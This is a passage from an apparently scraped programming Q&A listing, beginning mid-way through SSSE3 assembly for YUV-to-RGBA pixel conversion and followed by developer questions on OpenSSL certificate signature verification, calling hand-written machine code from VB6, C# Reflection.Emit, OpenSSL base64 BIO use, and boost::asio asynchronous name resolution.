xmm0,xmm3 ; upper half bgr0bgr0bgr0bgr0 ; write to output ptr movntdq [edi], xmm5 ; output first 4 pixels bypassing cache movntdq [edi+16], xmm0 ; output second 4 pixels bypassing cache %endmacro SECTION .data align=16 Const16 dw 16 dw 16 dw 16 dw 16 dw 16 dw 16 dw 16 dw 16 Const128 dw 128 dw 128 dw 128 dw 128 dw 128 dw 128 dw 128 dw 128 UMask db 0x01 db 0x80 db 0x01 db 0x80 db 0x05 db 0x80 db 0x05 db 0x80 db 0x09 db 0x80 db 0x09 db 0x80 db 0x0d db 0x80 db 0x0d db 0x80 VMask db 0x03 db 0x80 db 0x03 db 0x80 db 0x07 db 0x80 db 0x07 db 0x80 db 0x0b db 0x80 db 0x0b db 0x80 db 0x0f db 0x80 db 0x0f db 0x80 YMask db 0x00 db 0x80 db 0x02 db 0x80 db 0x04 db 0x80 db 0x06 db 0x80 db 0x08 db 0x80 db 0x0a db 0x80 db 0x0c db 0x80 db 0x0e db 0x80 ; void Convert_YUV422_RGBA32_SSSE3(void *fromPtr, void *toPtr, int width) width equ ebp+16 toPtr equ ebp+12 fromPtr equ ebp+8 ; void Convert_YUV420P_RGBA32_SSSE3(void *fromYPtr, void *fromUPtr, void *fromVPtr, void *toPtr, int width) width1 equ ebp+24 toPtr1 equ ebp+20 fromVPtr equ ebp+16 fromUPtr equ ebp+12 fromYPtr equ ebp+8 SECTION .text align=16 cglobal Convert_YUV422_RGBA32_SSSE3 ; reserve variables push ebp mov ebp, esp push edi push esi push ecx mov esi, [fromPtr] mov edi, [toPtr] mov ecx, [width] ; loop width / 8 times shr ecx,3 test ecx,ecx jng ENDLOOP REPEATLOOP: ; loop over width / 8 ; YUV422 packed inputer movdqa xmm0, [esi] ; should have yuyv yuyv yuyv yuyv pshufd xmm1, xmm0, 0xE4 ; copy to xmm1 movdqa xmm2, xmm0 ; copy to xmm2 ; extract both y giving y0y0 pshufb xmm0, [YMask] ; extract u and duplicate so each u in yuyv becomes u0u0 pshufb xmm1, [UMask] ; extract v and duplicate so each v in yuyv becomes v0v0 pshufb xmm2, [VMask] yuv2rgbsse2 rgba32sse2output ; endloop add edi,32 add esi,16 sub ecx, 1 ; apparently sub is better than dec jnz REPEATLOOP ENDLOOP: ; Cleanup pop ecx pop esi pop edi mov esp, ebp pop ebp ret cglobal Convert_YUV420P_RGBA32_SSSE3 ; reserve variables push ebp mov ebp, esp push edi push esi push ecx push eax push ebx mov esi, [fromYPtr] mov eax, [fromUPtr] mov ebx, [fromVPtr] mov edi, [toPtr1] mov ecx, [width1] ; loop width / 8 times shr ecx,3 test ecx,ecx jng ENDLOOP1 REPEATLOOP1: ; loop over width / 8 ; YUV420 Planar inputer movq xmm0, [esi] ; fetch 8 y values (8 bit) yyyyyyyy00000000 movd xmm1, [eax] ; fetch 4 u values (8 bit) uuuu000000000000 movd xmm2, [ebx] ; fetch 4 v values (8 bit) vvvv000000000000 ; extract y pxor xmm7,xmm7 ; 00000000000000000000000000000000 punpcklbw xmm0,xmm7 ; interleave xmm7 into xmm0 y0y0y0y0y0y0y0y0 ; extract u and duplicate so each becomes 0u0u punpcklbw xmm1,xmm7 ; interleave xmm7 into xmm1 u0u0u0u000000000 punpcklwd xmm1,xmm7 ; interleave again u000u000u000u000 pshuflw xmm1,xmm1, 0xA0 ; copy u values pshufhw xmm1,xmm1, 0xA0 ; to get u0u0 ; extract v punpcklbw xmm2,xmm7 ; interleave xmm7 into xmm1 v0v0v0v000000000 punpcklwd xmm2,xmm7 ; interleave again v000v000v000v000 pshuflw xmm2,xmm2, 0xA0 ; copy v values pshufhw xmm2,xmm2, 0xA0 ; to get v0v0 yuv2rgbsse2 rgba32sse2output ; endloop add edi,32 add esi,8 add eax,4 add ebx,4 sub ecx, 1 ; apparently sub is better than dec jnz REPEATLOOP1 ENDLOOP1: ; Cleanup pop ebx pop eax pop ecx pop esi pop edi mov esp, ebp pop ebp ret SECTION .note.GNU-stack noalloc noexec nowrite progbits

    Read the article

  • verifying the signature of x509

    - by sid
    Hi All, While verifying the certificate I am getting EVP_F_EVP_PKEY_GET1_DH My Aim - Verify the certificate signature. I am having 2 certificates : 1. a CA certificate 2. certificate issued by CA. I extracted the 'RSA Public Key (key)' Modulus From CA Certificate using, pPublicKey = X509_get_pubkey(x509); buf_len = (size_t) BN_num_bytes (bn); key = (unsigned char *)malloc (buf_len); n = BN_bn2bin (bn, (unsigned char *) key); if (n != buf_len) LOG(ERROR," : key error\n"); if (key[0] & 0x80) LOG(DEBUG, "00\n"); Now, I have CA public key & CA key length and also having certificate issued by CA in buffer, buffer length & public key. To verify the signature, I have following code int iRet1, iRet2, iRet3, iReason; iRet1 = EVP_VerifyInit(&md_ctx, EVP_sha1()); iRet2 = EVP_VerifyUpdate(&md_ctx, buf, buflen); iRet3 = EVP_VerifyFinal(&md_ctx, (const unsigned char *)CAkey, CAkeyLen, pubkey); iReason = ERR_get_error(); if(ERR_GET_REASON(iReason) == EVP_F_EVP_PKEY_GET1_DH) { LOG(ERROR, "EVP_F_EVP_PKEY_GET1_DH\n"); } LOG(INFO,"EVP_VerifyInit returned %d : EVP_VerifyUpdate returned %d : EVP_VerifyFinal = %d \n", iRet1, iRet2, iRet3); EVP_MD_CTX_cleanup(&md_ctx); EVP_PKEY_free(pubkey); if (iRet3 != 1) { LOG(ERROR,"EVP_VerifyFinal() failed\n"); ret = -1; } LOG(INFO,"signature is valid\n"); I am unable to figure out What might went wrong??? Please if anybody faced same issues? What EVP_F_EVP_PKEY_GET1_DH Error means? Thanks in Advance - opensid

    Read the article

  • Add two 32-bit integers in Assembler for use in VB6

    - by Emtucifor
    I would like to come up with the byte code in assembler (assembly?) for Windows machines to add two 32-bit longs and throw away the carry bit. I realize the "Windows machines" part is a little vague, but I'm assuming that the bytes for ADD are pretty much the same in all modern Intel instruction sets. I'm just trying to abuse VB a little and make some things faster. So... if the string "8A4C240833C0F6C1E075068B442404D3E0C20800" is the assembly code for SHL that can be "injected" into a VB6 program for a fast SHL operation expecting two Long parameters (we're ignoring here that 32-bit longs in VB6 are signed, just pretend they are unsigned), what is the hex string of bytes representing assembler instructions that will do the same thing to return the sum? The hex code above for SHL is, according to the author: mov eax, [esp+4] mov cl, [esp+8] shl eax, cl ret 8 I spit those bytes into a file and tried unassembling them in a windows command prompt using the old debug utility, but I figured out it's not working with the newer instruction set because it didn't like EAX when I tried assembling something but it was happy with AX. I know from comments in the source code that SHL EAX, CL is D3E0, but I don't have any reference to know what the bytes are for instruction ADD EAX, CL or I'd try it. I tried flat assembler and am not getting anything I can figure out how to use. I used it to assemble the original SHL code and got a very different result, not the same bytes. Help?

    Read the article

  • Dynamically overriding an abstract method in c#

    - by ng
    I have the following abstract class public abstract class AbstractThing { public String GetDescription() { return "This is " + GetName(); } public abstract String GetName(); } Now I would like to implement some new dynamic types from this like so. AssemblyName assemblyName = new AssemblyName(); assemblyName.Name = "My.TempAssembly"; AssemblyBuilder assemblyBuilder = Thread.GetDomain().DefineDynamicAssembly(assemblyName, AssemblyBuilderAccess.Run); ModuleBuilder moduleBuilder = assemblyBuilder.DefineDynamicModule("DynamicThings"); TypeBuilder typeBuilder = moduleBuilder.DefineType(someName + "_Thing", TypeAttributes.Public | TypeAttributes.Class, typeof(AbstractThing)); MethodBuilder methodBuilder = typeBuilder.DefineMethod("GetName", MethodAttributes.Public | MethodAttributes.ReuseSlot | MethodAttributes.Virtual | MethodAttributes.HideBySig, null, Type.EmptyTypes); ILGenerator msil = methodBuilder.GetILGenerator(); msil.EmitWriteLine(selectionList); msil.Emit(OpCodes.Ret); However when I try to instantiate via typeBuilder.CreateType(); I get an exception saying that there is no implementation for GetName. Is there something I am doing wrong here. I can not see the problem. Also, what would be the restrictions on instantiating such a class by name? For instance if I tried to instantiate via "My.TempAssembly.x_Thing" would it be availble for instantiation without the Type generated?

    Read the article

  • openssl crypto library - base64 conversion

    - by Hassan Syed
    I'm using openssl BIO objects to convert a binary string into a base64 string. The code is as follows: void ToBase64(std::string & s_in) { BIO * b_s = BIO_new( BIO_s_mem() ); BIO * b64_f = BIO_new( BIO_f_base64() ); b_s = BIO_push( b64_f , b_s); std::cout << "IN::" << s_in.length(); BIO_write(b_s, s_in.c_str(), s_in.length()); char * pp; int sz = BIO_get_mem_data(b_s, &pp); std::cout << "OUT::" << sz << endl; s_in.assign(pp,sz); //std::cout << sz << " " << std::string(pp,sz) << std::endl; BIO_free (b64_f); // TODO ret error potential BIO_free (b_s); // } The in length is either 64 or 72. However the output is always 65, which is incorrect it should be much larger than that. The documentation isn't the best in the world, AFAIK the bio_s_mem object is supposed to grow dynamically. What am I doing wrong ?

    Read the article

  • boost::asio::async_resolve Problem

    - by Moo-Juice
    Hi All, I'm in the process of constructing a Socket class that uses boost::asio. To start with, I made a connect method that took a host and a port and resolved it to an IP address. This worked well, so I decided to look in to async_resolve. However, my callback always gets an error code of 995 (using the same destination host/port as when it worked synchronously). code: Function that starts the resolution: // resolve a host asynchronously template<typename ResolveHandler> void resolveHost(const String& _host, Port _port, ResolveHandler _handler) const { boost::asio::ip::tcp::endpoint ret; boost::asio::ip::tcp::resolver::query query(_host, boost::lexical_cast<std::string>(_port)); boost::asio::ip::tcp::resolver r(m_IOService); r.async_resolve(query, _handler); }; // eo resolveHost Code that calls this function: void Socket::connect(const String& _host, Port _port) { // Anon function for resolution of the host-name and asynchronous calling of the above auto anonResolve = [this](const boost::system::error_code& _errorCode, boost::asio::ip::tcp::resolver_iterator _epIt) { // raise event onResolve.raise(SocketResolveEventArgs(*this, !_errorCode ? (*_epIt).host_name() : String(""), _errorCode)); // perform connect, calling back to anonymous function if(!_errorCode) connect(*_epIt); }; // Resolve the host calling back to anonymous function Root::instance().resolveHost(_host, _port, anonResolve); }; // eo connect The message() function of the error_code is: The I/O operation has been aborted because of either a thread exit or an application request And my main.cpp looks like this: int _tmain(int argc, _TCHAR* argv[]) { morse::Root root; TextSocket s; s.connect("somehost.com", 1234); while(true) { root.performIO(); // calls io_service::run_one() } return 0; } Thanks in advance!

    Read the article

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

< Previous Page | 14 15 16 17 18 19 20 21  | Next Page >